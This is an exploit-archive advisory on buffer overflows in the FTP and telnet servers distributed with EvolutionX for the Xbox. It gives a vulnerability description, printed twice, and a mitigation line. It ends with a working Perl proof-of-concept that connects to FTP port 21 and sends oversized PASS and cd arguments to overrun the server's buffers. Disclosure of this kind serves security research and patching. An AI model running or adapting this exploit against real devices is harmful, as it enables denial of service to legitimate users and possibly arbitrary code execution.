EvolutionX buffer overflow

vendor:

EvolutionX

by:

Moth7

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: EvolutionX

Affected Version From: EvolutionX

Affected Version To: EvolutionX

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: XBOX

2002

The FTP server that is distributed with EvolutionX has been reported prone to multiple buffer overflow vulnerabilities. The first of these vulnerabilities exists post-authentication, and is due to a lack of sufficient bounds checking performed on arguments that are passed to the 'cd' command. The second issue exists pre-authentication, excessive data passed as username:password combination to the affected FTP server will trigger the buffer overrun. Finally the telnet server that is distributed with EvolutionX has been reported prone to a buffer overflow vulnerability when handling excessive data passed as an argument to the 'dir' command. An attacker may exploit any one of these issues to deny service to legitimate users of the XBOX appliance, it has been conjectured that these issues may be exploitable to result in arbitrary code execution.

Mitigation:

Ensure that all user-supplied input is validated and sanitized before being used in any system operations.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9631/info

The FTP server that is distributed with EvolutionX has been reported prone to multiple buffer overflow vulnerabilities. The first of these vulnerabilities exists post-authentication, and is due to a lack of sufficient bounds checking performed on arguments that are passed to the 'cd' command.

The second issue exists pre-authentication, excessive data passed as username:password combination to the affected FTP server will trigger the buffer overrun. 

Finally the telnet server that is distributed with EvolutionX has been reported prone to a buffer overflow vulnerability when handling excessive data passed as an argument to the 'dir' command. 

An attacker may exploit any one of these issues to deny service to legitimate users of the XBOX appliance, it has been conjectured that these issues may be exploitable to result in arbitrary code execution.

#!/usr/bin/perl
#
# EvolutionX buffer overflow by Moth7
# http://www.bit-labs.net
#
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "ftp(21)",
);
unless ($remote) { die "cannot connect to ftp daemon on $host" }

$remote->autoflush(1);

print $remote "USER anonymous\r\n";
sleep(1);

$buf = '\m/'x999;

print $remote "PASS ".$buf."\r\n";      # Try and overrun the PASS buffer
sleep(1);

print $remote"cd ".$buf."\r\n";         # If it fails then overrun the cd buffer instead -
sleep(1);                               # but 2997 characters should do it :p

close $remote;